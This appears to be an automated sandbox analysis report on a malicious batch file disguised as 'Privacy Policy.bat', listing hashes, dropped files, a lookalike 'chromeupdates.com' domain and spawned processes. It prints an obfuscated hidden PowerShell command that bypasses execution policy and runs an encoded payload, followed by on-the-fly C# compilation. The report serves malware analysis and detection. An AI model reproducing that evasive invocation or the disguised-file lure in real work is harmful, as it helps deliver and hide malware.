SHA256 62aaf2cb350580b7f15d6a852495197eb7bb3e87d656de91bfcf7b75d791a430
SHA512 0a277d313266d9cb46b136d654c08090976ba80fbbfe2a809e77c6f5ebeca4e61203a74ffe87a9137e2ad0f53da15285fef8f5644113daf14291fefbe9c2d789

C:\WinExplorer\lib\encodings\__init__.py

MD5 7e6a62ef920ccbbc78acc236fdf027b5
SHA1 816afc9ea3c9943e6a7e2fae6351530c2956f349
SHA256 93cfd89699b7f800d6ccfb93266da4db6298bd73887956148d1345d5ca6742a9
SHA512 c883b506aacd94863a0dd8c890cbf7d6b1e493d1a9af9cdf912c047b1ca98691cfd910887961dd94825841b0fe9dadd3ab4e7866e26e10bfbbae1a2714a8f983

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c2d9eeb3fdd75834f0ac3f9767de8d6f
SHA1 4d16a7e82190f8490a00008bd53d85fb92e379b0
SHA256 1e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66
SHA512 d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-05 19:55

Reported

2024-11-05 19:58

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Privacy Policy.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Privacy Policy.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep by"pas"s -w hid"de"n -enc <Base64-encoded command>

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\77uqfd2w.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99F0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9897.tmp"

Network

Country Destination Domain Proto
US 8.8.8.8:53 chromeupdates.com udp
VN 202.92.4.57:443 chromeupdates.com tcp
VN 202.92.4.57:443 chromeupdates.com tcp

Files

\??\c:\Users\Admin\AppData\Local\Temp\77uqfd2w.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\77uqfd2w.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\CSC9897.tmp

C:\Users\Admin\AppData\Local\Temp\RES99F0.tmp

C:\Users\Admin\AppData\Local\Temp\77uqfd2w.pdb

C:\Users\Admin\AppData\Local\Temp\77uqfd2w.dll
